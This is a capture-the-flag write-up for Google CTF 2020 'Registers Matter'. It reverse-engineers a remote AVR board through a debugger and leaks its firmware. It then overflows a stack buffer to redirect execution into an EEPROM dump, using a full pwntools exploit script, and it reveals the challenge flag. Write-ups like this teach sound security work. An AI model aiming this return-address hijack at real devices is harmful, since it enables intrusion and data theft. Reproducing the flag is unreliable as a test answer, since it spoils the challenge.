Google CTF - Registers Matter (347pt / 12 solves)
Sneaky Arduino
August 23, 2020
hardware
rev
Registers Matter
We have an unknown remotely accessible board that hides the flag. Try to debug it to steal the flag!
Files:
Part 1: Investigation
We are given a debugger.py
script that lets us interact with a remote service:
$ python3 debugger.py registers.2020.ctfcompetition.com 1337
Please choose mode of operation:
D - debug session
C - challenge mode
Choice: d
DBG> reg
DBG>
pc = 000000 gp0 = 00 gp1 = 00 gp2 = 00 gp3 = 00 gp4 = 00 gp5 = 00 gp6 = 00 gp7 = 00
sp = 21FF gp8 = 00 gp9 = 00 gp10 = 00 gp11 = 00 gp12 = 00 gp13 = 00 gp14 = 00 gp15 = 00
flg = 00 gp16 = 00 gp17 = 00 gp18 = 00 gp19 = 00 gp20 = 00 gp21 = 00 gp22 = 00 gp23 = 00
000000000000 gp24 = 00 gp25 = 00 gp26 = 00 gp27 = 00 gp28 = 00 gp29 = 00 gp30 = 00 gp31 = 00 gp32 = 000000
step
DBG>
pc = 0000E4 gp0 = 00 gp1 = 00 gp2 = 00 gp3 = 00 gp4 = 00 gp5 = 00 gp6 = 00 gp7 = 00
sp = 21FF gp8 = 00 gp9 = 00 gp10 = 00 gp11 = 00 gp12 = 00 gp13 = 00 gp14 = 00 gp15 = 00
flg = 00 gp16 = 00 gp17 = 00 gp18 = 00 gp19 = 00 gp20 = 00 gp21 = 00 gp22 = 00 gp23 = 00
000000000001 gp24 = 00 gp25 = 00 gp26 = 00 gp27 = 00 gp28 = 00 gp29 = 00 gp30 = 00 gp31 = 00 gp32 = 000000
step
DBG>
pc = 0000E6 gp0 = 00 gp1 = 00 gp2 = 00 gp3 = 00 gp4 = 00 gp5 = 00 gp6 = 00 gp7 = 00
sp = 21FF gp8 = 00 gp9 = 00 gp10 = 00 gp11 = 00 gp12 = 00 gp13 = 00 gp14 = 00 gp15 = 00
flg = 02 gp16 = 00 gp17 = 00 gp18 = 00 gp19 = 00 gp20 = 00 gp21 = 00 gp22 = 00 gp23 = 00
000000000002 gp24 = 00 gp25 = 00 gp26 = 00 gp27 = 00 gp28 = 00 gp29 = 00 gp30 = 00 gp31 = 00 gp32 = 000000
The available options in the debugger are:
Available commands:
step [COUNT]
input STR
cont
trace
pause SECS
reg [<RN> <VALUE>] ... [<RN> <VALUE>]
break [delete|toggle N] | [ADDR]
write RAW-COMMAND
quit|exit
We have the ability to step through execution and view/modify register values. Unfortunately we have no information about the architecture.
However there are some things we can figure out right away:
- there are 32 8-bit “general purpose” registers (which is reminiscent of ARM or MIPS or another RISC arch…)
- the program counter is 24-bit
- the stack pointer is 16-bit
My first instinct here is to start tracing instructions and observe how they change the PC and different register values. This should let us build some sort of control flow graph.
We can type trace
to print register values after each instruction and then cont
to resume execution. We get a very long trace file and I wrote a python script to parse it.
If an instruction has two possible “next” instructions, I interpret this as some sort of branch. Otherwise I treat it as an unknown instruction and put modified registers inside the <>
. Here is the first portion of the graph:
lbl_0000:
[0000] :: <> ???
lbl_00E4:
[00E4] :: <flg> ???
[00E6] :: <flg> ???
[00E8] :: <gp28> ???
[00EA] :: <gp29> ???
[00EC] :: <> ???
[00EE] :: <> ???
[00F0] :: <> ???
[00F2] :: <> ???
[00F4] :: <gp17> ???
[00F6] :: <> ???
[00F8] :: <gp27> ???
[00FA] :: <gp30> ???
[00FC] :: <gp31> ???
[00FE] :: <> ???
[0100] :: <> ???
[0102] :: <> ???
[0108] :: <flg> ???
[010A] :: <flg> ???
[010C] :: branch [0104] [010E]
lbl_0104:
[0104] :: <gp30|gp31|gp0> ???
[0106] :: <gp26|gp27> ???
[0108] :: <flg> ???
[010A] :: <flg> ???
[010C] :: branch [0104] [010E]
lbl_010E:
[010E] :: <gp18> ???
[0110] :: <> ???
[0112] :: <> ???
[0114] :: <> ???
[0118] :: <flg> ???
[011A] :: <> ???
[011C] :: branch [0116] [011E]
lbl_0116:
[0116] :: <gp26> ???
[0118] :: <flg> ???
[011A] :: <> ???
[011C] :: branch [0116] [011E]
lbl_011E:
[011E] :: <sp> ???
[0596] :: <sp|gp32> ???
[0598] :: <sp|gp32> ???
...
First we jump to 0x00E4
and then there are several loops in a row. Also, some instructions modify pairs of registers, for eample gp30|gp31
and gp26|gp27
. Hang on a minute…
At this point I had a moment of realization and pulled up the bootloader section from the AVR challenge which I had been looking at earlier:
It’s a match!
Part 2: Leaking the binary
Now that we know the specifics of some of these instructions, we need a way to leak the whole binary. Before we do that though, it’s helpful to understand how memory works in an AVR architecture. There are a few types of memory:
- Program memory (ROM): contains executable code, instructions like
LPM
use this memory. - Data memory (RAM): contains R/W data, instructions like
LD
andST
use this memory. - EEPROM: contains read only memory accessible through interaction with memory mapped IO pins, (in this challenge the flag is stored here)
Luckily for us, the first part of the bootloader is transfering the data segment from program memory to data memory and hence we already have LPM
in a loop. Specifically, 0x104
is lpm r0, Z+
which loads a byte from the 16-bit address (Z == r31|r30) into r0 and then increments Z.
We can modify Z beforehand and then observe all the values of r0 during the trace. In practice, I needed to dump the binary in two separate chunks. Here is the fully reconstructed binary: regs.dat
Part 3: Reversing
Running the binary itself gives us the following options:
Menu:
1. Read from EEPROM
2. Magic function
0. Exit
Choice (do not enter more than 5 chars):
If we select 1
, we can read from EEPROM:
Enter start sector (16-31, 0 to exit): 16
Enter number of sectors to read (1-16): 1
=== EEPROM dump (0x800 - 0x880) ===
0800: 4865 6C6C 6F20 7468 6572 6521 0000 0000 | Hello there!....
0810: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0820: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0830: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0840: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0850: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0860: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0870: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
However we are restricted to a sector in the range [16,31]. In debug mode, I set a breakpoint here and modified the start register to be zero after the bounds check. This produces:
=== EEPROM dump (0x00 - 0x500) ===
0000: 4354 467B 4445 4255 475F 4D4F 4445 2C4E | CTF{DEBUG_MODE,N
0010: 4F54 2041 2046 4C41 477D 0000 0000 0000 | OT A FLAG}......
0020: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0030: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0040: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0050: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0060: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0070: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
So it is clear we need to somehow leak this data in “challenge” mode (i.e. without being able to directly modify registers).
Option 2
lets us enter two values and then it uses a jump table to print one of:
Wheee: %d, %d!\n
No magic for %d, %d :(\n
You are not a Wizard for Real magic of %d, %d :(\n
I have no idea what the purpose of this is and I didn’t end up using this during the exploit.
Part 4: Exploit
In the read_int
function, it ends up reading characters into a very small stack buffer with no bounds check, hence the (do not enter more than 5 chars)
message.
We can set a breakpoint at 0x22e
(address of ret
) and observe the values after we step:
Please choose mode of operation:
D - debug session
C - challenge mode
Choice: d
DBG> break 558
DBG> cont
Menu:
1. Read from EEPROM
2. Magic function
0. Exit
Choice (do not enter more than 5 chars): aabbccddeeffgg
pc = 00022E gp0 = A0 gp1 = 00 gp2 = 00 gp3 = 00 gp4 = 00 gp5 = 00 gp6 = 00 gp7 = 00
sp = 1DE5 gp8 = 00 gp9 = 00 gp10 = 00 gp11 = 00 gp12 = 17 gp13 = 04 gp14 = FA gp15 = 1D
flg = A0 gp16 = 00 gp17 = 04 gp18 = 31 gp19 = 00 gp20 = 00 gp21 = 02 gp22 = 00 gp23 = 04
00000001FE95 gp24 = 00 gp25 = 00 gp26 = 00 gp27 = 02 gp28 = 64 gp29 = 64 gp30 = DF gp31 = 1D gp32 = 646565
Breakpoint hit #1
Cycles passed: 130709
DBG> step
DBG>
pc = CACACC gp0 = A0 gp1 = 00 gp2 = 00 gp3 = 00 gp4 = 00 gp5 = 00 gp6 = 00 gp7 = 00
sp = 1DE8 gp8 = 00 gp9 = 00 gp10 = 00 gp11 = 00 gp12 = 17 gp13 = 04 gp14 = FA gp15 = 1D
flg = A0 gp16 = 00 gp17 = 04 gp18 = 31 gp19 = 00 gp20 = 00 gp21 = 02 gp22 = 00 gp23 = 04
00000001FE96 gp24 = 00 gp25 = 00 gp26 = 00 gp27 = 02 gp28 = 64 gp29 = 64 gp30 = DF gp31 = 1D gp32 = 666667
So we control Y
(gp29|gp28
) == 0x6464
and PC
(0x656566 * 2
).
To dump flash memory, we can simply set Y
to zero and jump to 0x45c
which is inside of the dump_flash
function right after we read start sector value. (here we are pretending we just set the start value to zero).
A slight point of confusion for me is that addresses in AVR are actually addr // 2
. So we need to store 0x22c
as the return address on the stack instead of 0x45c
.
Here is the full exploit script:
from pwn import *
def write(dat):
return ''.join(['@W%02X' % ord(x) for x in dat])
def decode(d):
arr = d.split('@W')[1:-1]
arr = [chr(int(x,16)) for x in arr]
return ''.join(arr)
s = remote('registers.2020.ctfcompetition.com', 1337)
s.sendafter('&M', '&C')
print(decode(s.clean(timeout=2)))
s.send(write('0 aabb\x00\x00\x00\x02\x2e\n'))
print(decode(s.clean(timeout=2)))
s.send(write('1\n'))
print(decode(s.clean(timeout=2)))
s.interactive()
=== EEPROM dump (0x00 - 0x80) ===
0000: 4354 467B 7233 3631 3537 3372 3539 3037 | CTF{r361573r5907
0010: 3337 3733 727D 0000 0000 0000 0000 0000 | 3773r}..........
0020: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0030: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0040: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0050: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0060: 0000 0000 0000 0000 0000 0000 0000 0000 | ................
0070: 0000 0000 0000 0000 0000 0000 0000 0000 | ................